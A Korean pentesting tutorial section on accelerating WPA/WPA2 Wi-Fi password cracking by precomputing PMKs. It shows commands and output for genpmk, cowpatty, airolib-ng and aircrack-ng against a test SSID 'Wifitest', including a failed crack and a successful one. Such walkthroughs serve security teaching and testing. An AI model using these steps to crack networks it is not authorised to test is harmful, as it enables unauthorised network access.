4) Wifi Wpa/Wpa2 비밀번호 크랙 가속화

사전 공유키(PMK)를 미리 계산하는 방법으로 가속화할 수 있다.
PMK 계산에는 SSID도 필요하므로 동일한 암호라 하더라도 SSID가 다르면 생성되는 PMK도 달라진다.
즉 PMK는 암호와 SSID에 따라 달라진다.

genpmk 툴을 사용하면 특정 SSID와 단어목록의 PMK를 미리 계산할 수 있다.
genpmk와 darkc0de.lst로 PMK 파일을 미리 생성한다.(상당히 오래 걸림)

root@bt:~# genpmk -f /pentest/passwords/wordlists/darkc0de.lst  -d PMK-Wifitest -s "Wifitest"
genpmk 1.1 - WPA-PSK precomputation attack.
File PMK-Wireless-Lab exists, appending new data.
key no. 1000: 012ih0n
key no. 2000: 070mi714n
key no. 3000: 0d0n746124
key no. 4000: 0pini0n47iv3n355
key no. 5000: 0v31212i07
key no. 6000: 0v312bu9
key no. 7000: 0vi6312m
key no. 8000: 1 ARSENIAN
key no. 9000: 1 BEVERLE
key no. 10000: 1 BUDROS
key no. 11000: 1 CIAGLO
key no. 12000: 1 DELLER
key no. 13000: 1 ELSBERND
key no. 14000: 1 FUMAGALLI
key no. 15000: 1 GROENSTEIN
key no. 16000: 1 HESSELGREN
key no. 17000: 1 JONATHON
key no. 18000: 1 KOJNOK
key no. 19000: 1 LESKAR
key no. 20000: 1 MARIJKE
key no. 21000: 1 MISSIMER
key no. 22000: 1 NOGALES
key no. 23000: 1 PETCHY
key no. 24000: 1 RAUMAKER
key no. 25000: 1 SALMONSON
key no. 26000: 1 SHAOLA
key no. 27000: 1 STERZINGER
key no. 28000: 1 TILAKAKAVATHY
key no. 29000: 1 VOGELSBERG
key no. 30000: 1 ZAHRAH
key no. 31000: 1066in6

1.cowpatty

genpmk 로 생성한 pmk 파일을 cowpatty 로 크랙한다.
미리 생성된 pmk 파일 크랙은 상당히 빨리 끝나지만, pmk로 만들때 사전에 등록되지 않은 비밀번호는 크랙되지 않는다.
아래 화면은 크랙에 실패한 화면

root@bt:~# cowpatty -d PMK-Wifitest -s "Wifitest" -r wpa-01.cap
cowpatty 4.6 - WPA-PSK dictionary attack. 
 
Collected all necessary data to mount crack against WPA/PSK passphrase.
Starting dictionary attack.  Please be patient.
key no. 10000: N3OeV9vcYF8nPRIDnk
key no. 20000: 1 BERMINGHAM
key no. 30000: 1 LEERUANGSRI
key no. 40000: 1 VIERNES
key no. 50000: 124chi70m9
key no. 60000: 177ind312m057
key no. 70000: 3 BADILLO
key no. 80000: 3xpui7i0n
key no. 90000: 4min04c370ph3n37idin3
key no. 100000: 53mi1235p3c74bi1i79
key no. 110000: 5hik412i
key no. 120000: 6120in3129
key no. 130000: 73130ph0123
key no. 140000: Aendenboom
key no. 150000: Barwikowski
key no. 160000: COOPRIDER
key no. 170000: Cyberpreppie
key no. 180000: Energy&Automation
key no. 190000: Giachino
key no. 200000: Hsiang-Hsin
key no. 210000: Kelliher
key no. 220000: M411in6
key no. 230000: Mnestheus
fread: Success
Unable to identify the PSK from the dictionary file. Try expanding your
passphrase list, and double-check the SSID.  Sorry it didn't work out.
 
239850 passphrases tested in 1.88 seconds:  127844.79 passphrases/second

이건 크랙에 성공한 화면

root@bt:~# cowpatty -d PMK-Wifitest5 -s "Wifitest" -r wpa-01.ca
cowpatty 4.6 - WPA-PSK dictionary attack. 
 
Collected all necessary data to mount crack against WPA/PSK passphrase.
Starting dictionary attack.  Please be patient.
 
The PSK is "12345678".
 
5 passphrases tested in 0.00 seconds:  70422.53 passphrases/second

2.airolib-ng

airolib-ng 로 pmk 파일을 변환하여 aircrack-ng로 크랙하는 방법

root@bt:~# airolib-ng PMK-Aircrack --import cowpatty PMK-Wifitest
Database  does not already exist, creating it...
Database  successfully created
Reading header...
Reading...
Updating references...
Writing...
root@bt:~# aircrack-ng -r PMK-Aircrack wpa-01.cap
Opening wpa-01.cap
Read 4167 packets.
 
   #  BSSID              ESSID                     Encryption
 
   1  00:08:9F:64:DD:3C  Wifitest              WPA (1 handshake)
 
Choosing first network as target.
 
Opening wpa-01.cap
Reading packets, please wait...
 
                                 Aircrack-ng 1.1 r2178
 
 
                   [00:00:02] 231364 keys tested (90728.21 k/s)
 
 
                       Current passphrase: N B Nelson                
 
 
      Master Key     : 5B AA CC B4 BF DC 7B C3 46 39 63 24 1B 22 2A F1
                       D1 96 CB 9C 12 DA 7E 5F 4A CE 2E 3F AD DA A3 B9
 
      Transient Key  : 25 46 A3 59 BF F4 C4 F4 13 3C 33 AA 1C A6 C0 C9
                       C3 35 62 68 7C 3A A2 90 B7 07 3F ED 34 6F 99 8F
                       80 9C B6 64 2D 4E F5 E8 2A FF B9 E9 FE 75 AC A9
                       CD A5 F7 DD 81 CF 0C A3 24 4A 8F A6 29 8D B8 BE
 
      EAPOL HMAC     : 4C F9 AA AD 48 50 5B 78 E5 73 46 90 4B 76 16 F7
 
 
Quitting aircrack-ng...